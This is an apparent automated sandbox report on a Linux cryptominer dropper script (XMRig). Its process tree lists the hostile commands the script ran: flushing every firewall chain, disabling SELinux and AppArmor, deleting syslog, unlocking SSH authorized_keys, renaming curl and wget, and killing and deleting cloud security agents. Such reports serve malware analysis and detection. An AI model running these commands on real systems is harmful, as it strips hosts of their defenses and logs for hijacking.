Analysis
-
max time kernel
149s -
max time network
145s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
08-12-2024 20:09
General
-
Target
newinit.sh
-
Size
46KB
-
MD5
d85918fc8a4f927f91d5914a149eabc4
-
SHA1
51e8581f114a18b9e98b0a860a03220f8209eea8
-
SHA256
520e22713960b96051de3d666c4ca1ebe01a9f34ea2281c646474b514a1aab1f
-
SHA512
5f57e8b30a0dd9920c5ae80b55421c9177a015ea1be329c5bd155d93aa41a6dcf73793f95e6ff2ce67a503ea32713fbeaf0be59b8c7924ac19248a4549d1aa69
-
SSDEEP
768:bxlT2wDuWvWi7XFNcuFkc2zq0x3UKnicZuiR/a6X85:8qF+Lc2/FicfS6X85
Score
10/10
Malware Config
Signatures
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
-
Adds new SSH keys 1 TTPs 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 64 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Loads a kernel module 2 IoCs
Loads a Linux kernel module, potentially to achieve persistence
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 4 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Deletes log files 1 TTPs 2 IoCs
Deletes log files on the system.
-
Disables AppArmor 64 IoCs
Disables AppArmor security module.
-
Disables SELinux 1 TTPs 11 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Write file to user bin folder 6 IoCs
-
Writes file to system bin folder 6 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Changes its process name 2 IoCs
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 29 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 8 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 36 IoCs
Malware often drops required files in the /tmp directory.
-
Software Deployment Tools 1 TTPs 1 IoCs
Use software deployment tools to execute code.
Processes
-
/tmp/newinit.sh/tmp/newinit.sh1⤵
- Adds new SSH keys
- Writes DNS configuration
- Creates/modifies Cron job
- Deletes log files
- Modifies rc script
- Write file to user bin folder
- Writes file to system bin folder
- Writes file to tmp directory
-
/bin/chmodchmod 777 /usr/bin/chattr2⤵
- File and Directory Permissions Modification
-
-
/bin/chmodchmod 777 /bin/chattr2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/sbin/ufwufw disable2⤵
-
/sbin/iptables/sbin/iptables -V3⤵
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
- Attempts to change immutable files
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵
- Flushes firewall rules
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵
- Flushes firewall rules
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
- Flushes firewall rules
- Attempts to change immutable files
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵
-
-
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
- Attempts to change immutable files
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
-
-
/bin/syncsync2⤵
-
-
/bin/catcat /var/spool/cron/2⤵
-
-
/bin/catcat /root/.ssh/authorized_keys2⤵
-
-
/bin/mvmv /usr/bin/wgettnt /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/curltnt /usr/bin/cd12⤵
-
-
/bin/mvmv /usr/bin/wget1 /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/curl1 /usr/bin/cd12⤵
-
-
/bin/mvmv /usr/bin/cur /usr/bin/cd12⤵
-
-
/bin/mvmv /usr/bin/cdl /usr/bin/cd12⤵
-
-
/bin/mvmv /usr/bin/cdt /usr/bin/cd12⤵
-
-
/bin/mvmv /usr/bin/xget /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/wge /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/wdl /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/wdt /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/wget /usr/bin/wd12⤵
-
-
/bin/mvmv /usr/bin/curl /usr/bin/cd12⤵
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
-
/usr/sbin/serviceservice apparmor stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
-
-
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
-
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
-
-
/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
- Changes its process name
-
/lib/systemd/systemd-sysv-install/lib/systemd/systemd-sysv-install disable apparmor3⤵
-
/usr/bin/getoptgetopt -o r: --long root: -- disable apparmor4⤵
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor disable4⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
-
-
-
/usr/sbin/serviceservice aliyun.service stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Disables AppArmor
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
-
-
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
-
/bin/systemctlsystemctl disable aliyun.service2⤵
-
-
/bin/grepgrep aegis2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Yun2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
-
/usr/local/bin/rmrm -rf3⤵
-
-
/usr/sbin/rmrm -rf3⤵
-
-
/usr/bin/rmrm -rf3⤵
-
-
/sbin/rmrm -rf3⤵
-
-
/bin/rmrm -rf3⤵
-
-
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
-
/usr/local/bin/dirnamedirname3⤵
-
-
/usr/sbin/dirnamedirname3⤵
-
-
/usr/bin/dirnamedirname3⤵
-
-
-
/usr/bin/awkawk "{print \$11}"2⤵
-
-
/bin/grepgrep aegis2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
-
/usr/local/bin/rmrm -rf3⤵
-
-
/usr/sbin/rmrm -rf3⤵
-
-
/usr/bin/rmrm -rf3⤵
-
-
/sbin/rmrm -rf3⤵
-
-
/bin/rmrm -rf3⤵
-
-
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
-
/usr/local/bin/dirnamedirname3⤵
-
-
/usr/sbin/dirnamedirname3⤵
-
-
/usr/bin/dirnamedirname3⤵
-
-
-
/usr/bin/awkawk "{print \$11}"2⤵
-
-
/bin/grepgrep hids2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
-
/usr/local/bin/rmrm -rf3⤵
-
-
/usr/sbin/rmrm -rf3⤵
-
-
/usr/bin/rmrm -rf3⤵
-
-
/sbin/rmrm -rf3⤵
-
-
/bin/rmrm -rf3⤵
-
-
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
-
/usr/local/bin/dirnamedirname3⤵
-
-
/usr/sbin/dirnamedirname3⤵
-
-
/usr/bin/dirnamedirname3⤵
-
-
-
/usr/bin/awkawk "{print \$11}"2⤵
-
-
/bin/grepgrep cloudwalker2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
-
/usr/local/bin/rmrm -rf3⤵
-
-
/usr/sbin/rmrm -rf3⤵
-
-
/usr/bin/rmrm -rf3⤵
-
-
/sbin/rmrm -rf3⤵
-
-
/bin/rmrm -rf3⤵
-
-
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
-
/usr/local/bin/dirnamedirname3⤵
-
-
/usr/sbin/dirnamedirname3⤵
-
-
/usr/bin/dirnamedirname3⤵
-
-
-
/usr/bin/awkawk "{print \$11}"2⤵
-
-
/bin/grepgrep titanagent2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep edr2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aegis2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep Yun2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hids2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep edr2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep cloudwalker2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep titanagent2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep sgagent2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep barad_agent2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hostguard2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/rmrm -rf /usr/local/aegis2⤵
-
-
/bin/sleepsleep 12⤵
-
-
/usr/bin/chattrchattr -i /usr/bin/ip6network2⤵
- Attempts to change immutable files
- System Network Configuration Discovery
-
-
/usr/bin/chattrchattr -i /usr/bin/kswaped2⤵
-
-
/usr/bin/chattrchattr -i /usr/bin/irqbalanced2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -i /usr/bin/rctlcli2⤵
-
-
/usr/bin/chattrchattr -i /usr/bin/systemd-network2⤵
-
-
/usr/bin/chattrchattr -i /usr/bin/pamdicks2⤵
-
-
/usr/bin/chattrchattr +i /usr/bin/ip6network2⤵
- System Network Configuration Discovery
-
-
/usr/bin/chattrchattr +i /usr/bin/kswaped2⤵
-
-
/usr/bin/chattrchattr +i /usr/bin/irqbalanced2⤵
-
-
/usr/bin/chattrchattr +i /usr/bin/rctlcli2⤵
- Attempts to change immutable files
-
-
